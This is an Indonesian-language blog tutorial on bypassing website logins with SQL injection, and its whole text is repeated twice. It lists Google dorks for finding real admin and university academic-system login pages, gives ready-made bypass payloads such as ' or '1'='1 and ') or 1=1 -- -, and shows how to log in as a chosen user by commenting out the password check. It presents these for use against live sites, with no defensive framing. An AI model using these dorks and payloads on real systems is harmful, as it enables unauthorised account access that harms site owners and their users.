Halo sahabat No Light, di postingan pertama ini saya akan membagikan tutorial tentang SQL Injection. Tehnik SQLi pada tutorial ini akan digunakan untuk membypass akses login dari sebuah website. Jadi di postingan ini dan postingan kedepannya saya hanya akan membahasnya secara sederhana dan simple saja.
Untuk mencari website yang memiliki halaman login terutama admin dapat kalian cari dengan dork berikut :
inurl:login[4"admin"] site:
inurl:admin ["Userlogin"]**site:
inurl:/admin.php intext:login intext:adminsitrator intext:username
inurl:/admin/index.php
inurl :/admin/Admin.php intext:login inurl:/administrator/login.php intext:username site:.
inurl:/login.php intext:administrator intext:login
inurl:/admin/upoload/ inurl:/admin/login.php/ intitle:Administrator
inurl:/admin/login.php intitle: Panel Admin
inurl:/admin/login.php site:in
inurl / mnux=login kampus
inurl / mnux=login akademik
inurl / mnux=login powered by sisfo
inurl /?mnux=login "powered by sisfo kampus"
inurl / mnux=login sisfo kampus
inurl / mnux=login admin
inurl >:& quot mnux =& quot akademik
inurl / mnux=login powered by sisfo
inurl :/? mnux login
inurl / mnux=login id /?mnux=login&lgn=frm siakad
inurl / mnux=login akademik administrasi akademik - universitas sisfokampus
inurl >:& quot mnux =& quot akademik
inurl:/admin/img/ ext:jpg
inurl:/admin/foto_berita
inurl:/admin/img/ "products"
inurl:/admin/img_gallery "blog"
Jadi SQLi, yaitu kita menginjeksi atau memanipulasi perintah SQL pada website. Untuk memanipulasi perintah SQL yang digunakan pada halaman login website dapat menggunakan payload seperti berikut :
' or '1'='1
' or 1=1 -- -'
'='' or '
') or ''='
') or 1=1 -- -
Payload di atas kita masukan untuk username dan password. Jika website tidak memiliki filter terhadap SQLi, maka kita akan dapat login tanpa memiliki akun. Mengapa bisa terjadi ? Untuk perintah SQL yang digunakan pada kasus ini adalah kebanyakan seperti ini :
SELECT * FROM member WHERE username='{$user}' AND password = '{$user}'
Setelah payload dimasukan, perintah SQL akan menjadi seperti ini :
SELECT * FROM member WHERE username='' or '1'='1' AND password = '' or '1'='1'
Maka database akan memberikan seluruh data member, contoh seperti ini :
Jika semisal data yang diambil dari database seperti diatas, kita akan ter-Login dengan menggunakan akun pada baris paling atas yaitu tono2. Jika ingin menggunakan akun lain semisal kita sudah tau username atau emailnya. Kita masukan payload hanya pada passwordnya saja atau dengan payload berikut ( masukan pada username atau email ) :
tono@mail.com' -- -'
Setelah payload dimasukan, perintah SQL akan menjadi seperti ini :
SELECT * FROM member WHERE username='tono@mail.com' -- -'' AND password = 'terserah'
Warna hijau adalah sebuah komentar pada perintah SQL jadi perintah setelah tanda "-- -" tidak akan terbaca atau tidak di eksekusi. Oke, segitu saja ya untuk postingan pertama ini semoga bermanfaat.
Untuk mencari website yang memiliki halaman login terutama admin dapat kalian cari dengan dork berikut :
inurl:login[4"admin"] site:
inurl:admin ["Userlogin"]**site:
inurl:/admin.php intext:login intext:adminsitrator intext:username
inurl:/admin/index.php
inurl :/admin/Admin.php intext:login inurl:/administrator/login.php intext:username site:.
inurl:/login.php intext:administrator intext:login
inurl:/admin/upoload/ inurl:/admin/login.php/ intitle:Administrator
inurl:/admin/login.php intitle: Panel Admin
inurl:/admin/login.php site:in
inurl / mnux=login kampus
inurl / mnux=login akademik
inurl / mnux=login powered by sisfo
inurl /?mnux=login "powered by sisfo kampus"
inurl / mnux=login sisfo kampus
inurl / mnux=login admin
inurl >:& quot mnux =& quot akademik
inurl / mnux=login powered by sisfo
inurl :/? mnux login
inurl / mnux=login id /?mnux=login&lgn=frm siakad
inurl / mnux=login akademik administrasi akademik - universitas sisfokampus
inurl >:& quot mnux =& quot akademik
inurl:/admin/img/ ext:jpg
inurl:/admin/foto_berita
inurl:/admin/img/ "products"
inurl:/admin/img_gallery "blog"
Jadi SQLi, yaitu kita menginjeksi atau memanipulasi perintah SQL pada website. Untuk memanipulasi perintah SQL yang digunakan pada halaman login website dapat menggunakan payload seperti berikut :
' or '1'='1
' or 1=1 -- -'
'='' or '
') or ''='
') or 1=1 -- -
Payload di atas kita masukan untuk username dan password. Jika website tidak memiliki filter terhadap SQLi, maka kita akan dapat login tanpa memiliki akun. Mengapa bisa terjadi ? Untuk perintah SQL yang digunakan pada kasus ini adalah kebanyakan seperti ini :
SELECT * FROM member WHERE username='{$user}' AND password = '{$user}'
Setelah payload dimasukan, perintah SQL akan menjadi seperti ini :
SELECT * FROM member WHERE username='' or '1'='1' AND password = '' or '1'='1'
Maka database akan memberikan seluruh data member, contoh seperti ini :
Jika semisal data yang diambil dari database seperti diatas, kita akan ter-Login dengan menggunakan akun pada baris paling atas yaitu tono2. Jika ingin menggunakan akun lain semisal kita sudah tau username atau emailnya. Kita masukan payload hanya pada passwordnya saja atau dengan payload berikut ( masukan pada username atau email ) :
tono@mail.com' -- -'
Setelah payload dimasukan, perintah SQL akan menjadi seperti ini :
SELECT * FROM member WHERE username='tono@mail.com' -- -'' AND password = 'terserah'
Warna hijau adalah sebuah komentar pada perintah SQL jadi perintah setelah tanda "-- -" tidak akan terbaca atau tidak di eksekusi. Oke, segitu saja ya untuk postingan pertama ini semoga bermanfaat.
0 komentar:
Post a Comment